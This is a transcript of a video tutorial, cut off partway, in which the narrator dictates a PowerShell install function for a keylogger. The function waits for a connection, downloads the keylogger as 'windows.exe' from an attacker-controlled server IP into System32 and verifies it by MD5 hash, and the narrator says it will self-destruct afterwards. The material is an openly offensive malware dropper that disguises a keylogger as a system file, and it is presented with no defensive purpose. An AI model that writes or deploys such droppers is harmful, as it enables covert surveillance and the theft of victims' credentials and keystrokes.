Okay, so let's go ahead and write the second function. So this one will be function install. Again, it will take no arguments, and just gonna go ahead and do it like this. So we're gonna begin by using an if statement. So there will be no infinite loops here, but there will be an indefinite recursive call of the function for as long as the connection condition is not met. So it will check for the connection. If there is no connection, it will sleep and then call itself again. So as soon as there is connection, it will actually download and let's say install the keylogger, and it will self-destruct. Okay, so if, and we're gonna type in check inet. Basically, check inet will return 0 or 1. If it returns 1, obviously there is connection. If it returns 0, there is no connection. And 0 is interpreted as false, and 1 is interpreted as true. So if this statement is true, go ahead and perform the following set of operations. Storage dir, so we're just going to name this one as this variable storage directory or storage dir. And then we're going to go ahead and type in C:\\/ Windows / system 32 and / again. Close the quote marks, semicolon at the end. Although technically you do not require these semicolons here in PowerShell, it is fine to write them without them because you're going to the next lines. But since this entire PowerShell script will be on a single line, we want to separate these things with semicolons, like in standard like it is a standard, for example, in C or C++ or Java or whatever. And that's why we're placing semicolons at the end. But in theory, we don't actually require them. Okay, so web client. Fortunately, there is a built-in functionality to actually download things from the internet. New object system.net.web client semicolon. And this, what we're doing now is we're prepping up the turf for the download of the file. And now we're gonna give a URL, and the URL will be HTTP sorry, it's gonna be like equal and then HTTP :/, oh god, HTTP :/ and then we need the IP address of our server. So let's go ahead and visit our other screen. And just start a new instance. DigitalOcean. I've told you to write the IP address down, but I didn't write it down, which was funny in and of itself, but hey. Okay, so let me just go ahead and see. So demo is 46.101.183.87. I can't actually copy it from here. So I will need to actually go on to... I'll just write it down somewhere on the side. It doesn't matter. And now I'm going to retype it here. So it's going to be 46. Your IP address will obviously be different. So please, take a look at your IP address and not mine. So 46.101.183.87. And then we're going to do a // again. And now we need to basically give the path to our keyloggers. So windows.exe. Excellent. So this will be actually downloaded from the net. Okay, semicolon, close the quote mark, semicolon at the end, and move on to the next line. Next line shall be file equals, and in file equals, we'll basically be using the storage dir variable. So we'll basically just go like this, storage dir, and after the storage dir, we'll do \\, windows dot exe, and close the quote marks and line terminator at the end. So the storage dir is C Windows System32, and the file that is going to be stored there is windows.exe, the one that we actually downloaded from the internet, from our own server. Next up, we'll type in web client dot download file, and we're gonna do this. Then we're gonna use our own variable URL and our own variable file. Close this, line terminator at the end, and that's it. So this is the URL from which it is to be downloaded and where it is to be downloaded. Obviously, the URL is from where, and the file is where will it be stored on the local system. So next up, it's file path, and we're going to do this equals and a quote mark, and it's going to be C:\\/ Windows system32 //windows.exe. I gotta tell you, it's a lot easier to just write the code than as opposed to writing it and explaining it at the same time. Okay, so now we have this full file path here. There's a little bit of redundant code here, perhaps a few things that could have been done differently to reduce the amount of variables, but it doesn't really matter that much in terms of performance anyway. So we type in MD5. What we shall do now is check the hash of the downloaded file to verify that the download is actually complete and successful. So that we did not actually download a partial file or anything like that, but rather instead that the full file has been downloaded. Because there is a possibility that during the mid of the download, the connection will simply terminate. I don't know, somebody will put a laptop to sleep, or the machine will simply lose the internet connectivity or whatever. So we need to check the hash. If the hashes do not match, the function needs to recall and repeat the procedure at a later date. So new dash object type name system dot security dot cryptography. Thank you for the autocomplete. MD5 crypto service provider, and a line terminator at the end. So this is just the default way of checking the hash, basically, or a semi-default way, let's put it like that. So variable hash will be next. This shall be equal to system dot bit converter, close it, colon to string, and then we need the hash, the hashing algorithm. So MD5 MD5 dot compute hash, and after that we need to open up blocks. So system dot io dot file. Oops, a bit of too much code here. Okay, read all byte and bytes, right? So now we need to open up another parentheses and do this basically file, path, and then just close everything up. You need 3 parentheses at the end, semicolon. That's it. So now we move on into the next line. And the next line is the next if statement. So let's just separate it from this. So if, and then we're going to do this file path. Sorry, my apologies. So if hash and then dash EQ, which stands for equal. And then we need the quote marks. And now we need the hash from our web server, which we shall place here. So we need to grab that hash from our web server and then place it here so that we compare the two of these. Okay, so we're going to do that in the follow-up tutorial. For the time being, I'm going to call it here, and then we shall continue on in the follow-up. There isn't a lot more to do, maybe some 20 more lines of code, and then we're done with this script.